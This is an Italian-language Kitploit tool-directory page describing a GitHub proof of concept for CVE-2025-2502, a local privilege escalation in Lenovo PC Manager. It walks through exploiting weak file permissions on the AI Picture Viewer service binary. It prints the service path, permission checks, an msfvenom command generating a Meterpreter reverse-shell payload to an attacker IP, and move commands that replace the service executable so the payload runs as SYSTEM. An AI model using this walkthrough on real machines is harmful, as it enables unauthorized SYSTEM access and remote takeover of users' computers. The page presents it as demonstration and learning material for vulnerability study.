Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-2502 — Dimostrazione passo-passo di una vulnerabilità di escalation locale dei privilegi in Lenovo PC Manager, che sfrutta permessi deboli sui file di un servizio di sistema per ottenere accesso SYSTEM tramite sostituzione del payload. | Kitploit
Strumenti/GitHubGitHub/ihk-one/cve-2025-2502
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitApprendimento e FormazioneLab e Pratica
GitHubihk-one/cve-2025-2502

CVE-2025-2502

Dimostrazione passo-passo di una vulnerabilità di escalation locale dei privilegi in Lenovo PC Manager, che sfrutta permessi deboli sui file di un servizio di sistema per ottenere accesso SYSTEM tramite sostituzione del payload.

Vedi Repository
5311 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Scoperto accidentalmente durante lo studio dell'elevazione dei privilegi locali.

In qualsiasi versione del Lenovo PC Manager, gli strumenti hanno una vulnerabilità di autorizzazione: qualsiasi strumento scaricato concede all'utente normale il permesso F (controllo completo).

Poiché gli strumenti di tutte le versioni presentano problemi di autorizzazione, un utente normale può ottenere i permessi di admin. Qui utilizziamo il plugin AI Picture Viewer come dimostrazione, poiché ha un servizio con privilegi di sistema che può essere elevato a system. Prima della versione 5.1.100.1102, Lenovo PC Manager includeva il plugin AI Picture Viewer.

Dopo aver installato il plugin AI Picture Viewer, esiste un servizio persistente.

root@kitploit:~
C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe

Utilizzare icacls per visualizzare le autorizzazioni del file.

Si scopre che l'autorizzazione degli utenti normali è I F, controllo completo. Creare un utente normale.

Dal punto di vista dell'attacco, quando il gruppo Administrators non è connesso, è necessario disconnettere tutti gli utenti, quindi entrare come utente user1 e utilizzare sc per visualizzare il servizio, il cui utente è LocalSystem.

root@kitploit:~
sc qc KPICService_Lenovo

Il file C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe è quello su cui l'utente normale ha il controllo completo.

Tuttavia, a causa delle limitazioni, il servizio rimane in esecuzione e l'utente normale necessita dei privilegi di admin per fermarlo.

Proviamo un approccio diverso: poiché l'utente normale ha il controllo completo, può spostare il file. Al riavvio, il servizio legge il percorso configurato e avvia comunque kpicservice.exe come LocalSystem.

Ora passiamo all'azione: generiamo un kpicservice.exe.

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.133 LPORT=4444 -f exe -o kpicservice.exe

Allo stesso tempo, spostiamo il file originale e sostituiamo il file kpicservice.exe originale con la shell.

root@kitploit:~
move C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe kpicservice.exe
move Desktop\kpicservice.exe C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe

A questo punto, riavviando il dispositivo, il servizio avvierà il file kpicservice sostituito nel percorso, ottenendo i privilegi di system.

Scarica lo strumento